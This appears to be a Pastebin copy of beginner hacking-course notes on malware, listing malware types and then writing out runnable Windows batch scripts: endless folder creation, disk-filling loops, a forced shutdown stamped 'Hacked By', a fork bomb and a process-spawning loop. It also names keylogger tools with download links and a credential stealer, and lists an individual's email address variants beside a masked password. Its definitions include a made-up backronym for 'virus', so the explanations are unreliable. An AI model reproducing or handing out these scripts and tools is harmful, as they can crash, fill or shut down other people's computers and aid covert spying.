itsroopam1998

Grade 1 Session 5

May 11th, 2018
52
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.02 KB | None | 0 0
  1. Session 5
  2. =========
  3. Malware Illustration
  4. --------------------
  5. MAL = MALicious
  6. WARE = softWARE
  7. MALWARE --> MALicious softWARE
  8. To destroy the system, harm the system, can be used for spying a system.
  9. It can be anything
  10. Software
  11. Tool
  12. Application
  13. Code Snipet
  14. File
  15. MP3
  16. Picture
  17. Text
  18.  
  19. Types Of Malware:
  20. 1. Spyware
  21. 2. Virus
  22. 3. Worm
  23. 4. Trojan
  24. 5. Keyloggers
  25. 6. Adware
  26. 7. Ransomware
  27. 8. Botnet
  28. 9. Rootkits
  29.  
  30. 1. Virus
  31. ========
  32. Vital Information Resource Under Seize
  33. These are the applications, tools, software, code snippets which can harm your system.
  34. Hang
  35. Slow Down
  36. Hidden
  37. Replicate
  38. Delete
  39. Extension Change
  40. Batch File Virus --> .bat --> Windows OS
  41. 1. Infinite Folders
  42.  
  43. :maitreya
  44. mkdir %random%
  45. goto maitreya
  46.  
  47. 2. Space Consuming Virus
  48.  
  49. :selfie
  50. mkdir alome
  51. cd alome
  52. echo "Aa gya hero alome, Dhinchak Pooja">>dhinchakPooja.txt
  53. goto selfie
  54.  
  55. 3. Space Eating Virus
  56. echo "Me Hu Don.... Space Kha Jaunga....">>papa.txt
  57. :mummy
  58. type papa.txt>>papa.txt
  59. goto mummy
  60. 4. Shutdown virus
  61. shutdown -s -t 10 -c "Hacked By Sahil Hacker"
  62. 5. Fork Bomb
  63. %0|%0
  64. 6. Process calling
  65. :label
  66. start cmd.exe -c
  67. goto label
  68.  
  69. Types of Viruses --> 9
  70. 1. Polymorphic Virus
  71. 2. Boot Sector Virus
  72. 3. Time Bomb
  73. 4. Browser Infector
  74. 5. Macro Virus
  75. 6. Multipartite
  76.  
  77. vaibhavchaudhary254@gmail.com ---> ***********
  78. vaibhav.chaudhary254@gmail.com
  79. v.a.i.b.havchaudhary254@gmail.com
  80. vaibhav.chaudhary.2.5.4.@gmail.com
  81. v.a.i.b.h.a.v.c.h.a.u.d.h.a.r.y.2.5.4.@gmail.com
  82.  
  83. 2. Keyloggers
  84. =============
  85. They are the applications which are used for getting the keystrokes of the target device or the device in which it is installed.
  86. 1. Local storage Keylogger
  87. BPK Keylogger
  88. http://www.blazingtools.com/downloads.html
  89. Family Keylogger
  90. http://www.spyarsenal.com/download.html
  91. 2. Remote Keylogger
  92. iStealer6
  93.  
  94. 3. Ransomware
  95. =============
  96. Which encrypts the file and ask you for the money. It encrypts the system file.
Add Comment
Please, Sign In to add comment